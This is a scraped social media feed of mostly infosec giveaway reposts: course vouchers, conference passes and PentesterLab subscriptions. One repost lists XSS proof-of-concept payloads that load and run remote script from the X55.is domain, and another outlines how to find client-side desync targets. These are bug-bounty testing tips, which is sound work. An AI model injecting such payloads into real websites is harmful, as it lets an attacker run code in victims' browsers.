RakutenRapidAPI's profile picture.

johnpi

@RakutenRapidAPI

johnpi reposted

🎉 Great news for my followers! Huge thanks to @theXSSrat 🙏 I’ll be giving away 50 coupons, each worth 25€ 💸 To join: 👣 Follow me 🔁 Retweet this post 💬 Leave a comment Winners will be picked soon based on engagement. Good luck 🍀

NullSecurityX's tweet image. 🎉 Great news for my followers!
Huge thanks to @theXSSrat 🙏
I’ll be giving away 50 coupons, each worth 25€ 💸

To join:
👣 Follow me
🔁 Retweet this post
💬 Leave a comment

Winners will be picked soon based on engagement. Good luck 🍀

johnpi reposted

🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting

Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…

x55.is

XSS Gym - Train your XSS Muscles

More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).



johnpi reposted

🚨 GIVEAWAY ALERT 🚨 Got 2 fresh @RealTryHackMe 1-month vouchers burning a hole in my pocket 🔥 Meanwhile… my hackers toolkit is 85% off (all current + future courses in one) thexssrat.podia.com/full-house-bun… Want one? Do this: 1️⃣ Follow @TheXSSRat + @RealTryHackMe 2️⃣ Share this post…


johnpi reposted

🎉 We’re partnering with @theXSSrat for a special giveaway! Once we hit 5,000 followers, 1 lucky winner will get access to $600 worth of cybersecurity courses — for FREE! To enter the giveaway: ✅ Follow 🔁 Retweet this post 💬 Leave a comment 📚 Course thexssrat.podia.com/full-house-bun…

NullSecurityX's tweet image. 🎉 We’re partnering with @theXSSrat for a special giveaway!
Once we hit 5,000 followers, 1 lucky winner will get access to $600 worth of cybersecurity courses — for FREE!

To enter the giveaway:
✅ Follow
🔁 Retweet this post
💬 Leave a comment

📚 Course
thexssrat.podia.com/full-house-bun…

johnpi reposted

How to find viable targets for client-side desync attacks: 1️⃣ Open Burp Suite and intercept requests. 2️⃣ Choose an endpoint that wouldn't usually expect a POST request (e.g GET) and send it to repeater. 3️⃣ Go to Inspector > Request Attributes > Protocol field > Upgrade to…


johnpi reposted

🚨 GIVEAWAY: The Endless Bundle 🧠💥 Our full ethical hacking course library — lifetime access, all future updates. 🔐 To enter: - Like ❤️ - Repost 🔁 - Comment and tag your best hacking buddy 🤟 Follow @XSSRat 💻 260+ lessons | Labs | Discord | Weekly updates 🔥 Bug bounty,…

theXSSrat's tweet image. 🚨 GIVEAWAY: The Endless Bundle 🧠💥
Our full ethical hacking course library — lifetime access, all future updates.

🔐 To enter:
- Like ❤️
- Repost 🔁
- Comment and tag your best hacking buddy 🤟

Follow @XSSRat

💻 260+ lessons | Labs | Discord | Weekly updates
🔥 Bug bounty,…

johnpi reposted

To celebrate our badge launch, we're giving away FIVE free 6-month licenses to @pentesterlab. ✅ Comment BADGELIFE and retweet this post to enter. Additionally, pre-order a custom badge at shop.bugbountydefcon.com for a chance to win one of FIVE Annual VIP+ subscription to…


johnpi reposted

Time for another giveaway! We are going to send a t-shirt and a few goodies to one person who follows @PentesterLab and retweets this tweet!! And we are going to give a 12-month voucher to someone who follows @PentesterLab and likes this tweet!!


johnpi reposted

I’m Giving Away 3 Free Tickets to atten IWCon W2022 by @InfoSecComm To participate in the giveaway RT #IWCon #infosec #cloudsecurity #Giveaways

DhiyaneshDK's tweet image. I’m Giving Away 3 Free Tickets to atten IWCon W2022 by @InfoSecComm 

To participate in the giveaway RT 

#IWCon #infosec #cloudsecurity #Giveaways

johnpi reposted

Hey there! I have 2 conference passes for IWCON2.0 which is happening on 17th-18th December, 2022. To enter the giveaway: 1. Follow @thebinarybot 🫂 2. Retweet 🔁 3. Comment which talk you are highly looking forward to 💭 #bugbounty #infosec #cybersecurity #hacking

thebinarybot's tweet image. Hey there! 

I have 2 conference passes for IWCON2.0 which is happening on 17th-18th December, 2022.

To enter the giveaway:

1. Follow @thebinarybot 🫂
2. Retweet 🔁
3. Comment which talk you are highly looking forward to 💭

#bugbounty #infosec #cybersecurity #hacking

johnpi reposted

I've got two passes for IWCON2.0 happening on 17th-18th December, 2022 from the awesome folks @InfoSecComm 👋 Register here : iwcon.live To win these passes just retweet this and like the tweet. Two of the luck winners will be contacted by the team for the passes.

AseemShrey's tweet image. I&apos;ve got two passes for IWCON2.0 happening on 17th-18th December, 2022 from the awesome folks @InfoSecComm 👋

Register here : iwcon.live

To win these passes just retweet this and like the tweet. Two of the luck winners will be contacted by the team for the passes.

johnpi reposted

It's Black Friday! 🎉 Get FREE recurring API credits if you like + retweet this tweet (must be following @securitytrails). If we get up to 100 RTs everyone gets 100 recurring monthly API credits. If we get over 100 RTs, everyone gets the # of API credits in the amount of RTs.

securitytrails's tweet image. It&apos;s Black Friday! 🎉

Get FREE recurring API credits if you like + retweet this tweet (must be following @securitytrails).

If we get up to 100 RTs everyone gets 100 recurring monthly API credits. If we get over 100 RTs, everyone gets the # of API credits in the amount of RTs.

johnpi reposted

Another Black Friday Giveaway! Make sure you check our deals: pentesterlab.com/pro We are going to send a t-shirt and a few goodies to one person who retweets this tweet!! And we are going to give a 12-month voucher to someone who likes this tweet!!


johnpi reposted

Black Friday Giveaway! Make sure you check our deals: pentesterlab.com/pro We are going to send a t-shirt and a few goodies to one person who retweets this tweet!! And we are going to give a 12-month voucher to someone who follows @PentesterLab and likes this tweet!!


johnpi reposted

Time for another giveaway! We are going to send a t-shirt and a few goodies to one person who follows @PentesterLab and retweets this tweet!! And we are going to give a 12-month voucher to someone who follows @PentesterLab and likes this tweet!!


johnpi reposted

Who wants some swag? 😍 We're doing it again!!!! Today we’re giving away another of our ultra-rare swag 😇😇 Retweet!!! Retweet!!! Retweet!!!

ShowwcaseHQ's tweet image. Who wants some swag? 😍

We&apos;re doing it again!!!!

Today we’re giving away another of our ultra-rare swag 😇😇

Retweet!!! Retweet!!! Retweet!!!
ShowwcaseHQ's tweet image. Who wants some swag? 😍

We&apos;re doing it again!!!!

Today we’re giving away another of our ultra-rare swag 😇😇

Retweet!!! Retweet!!! Retweet!!!
ShowwcaseHQ's tweet image. Who wants some swag? 😍

We&apos;re doing it again!!!!

Today we’re giving away another of our ultra-rare swag 😇😇

Retweet!!! Retweet!!! Retweet!!!

johnpi reposted

GIVEAWAY of my Offensive C# course. I am giving my course free for 5 people. To Enter Like this tweet and Retweet Winners will be picked in 2 days udemy.com/course/offensi… #infosec #giveaway #CybersecurityAwarenessMonth #redteam #CyberSecurityAwareness

Ox4d5a's tweet image. GIVEAWAY of my Offensive C# course. I am giving my course free for 5 people. 
To Enter Like this tweet and Retweet 
Winners will be picked in 2 days

udemy.com/course/offensi…

#infosec #giveaway #CybersecurityAwarenessMonth
#redteam #CyberSecurityAwareness

johnpi reposted

𝑮𝒊𝒗𝒆𝒂𝒘𝒂𝒚 𝒕𝒊𝒎𝒆! We are going to giveaway 3-months subscription of @PentesterLab to 2 Participants! To Participate: 1. Follow, like & retweet 2. Join our Discord Server: bit.ly/3MjJbN7 #bugbounty #bugbountytips #giveway #pentesterlab


johnpi reposted

🎉🎉 Give away ! 🎉🎉 Giving away 3 months subscription from pentesterlab. RT and comment a cool #bugbounty tip.


United States Trends

Loading...

Something went wrong.


Something went wrong.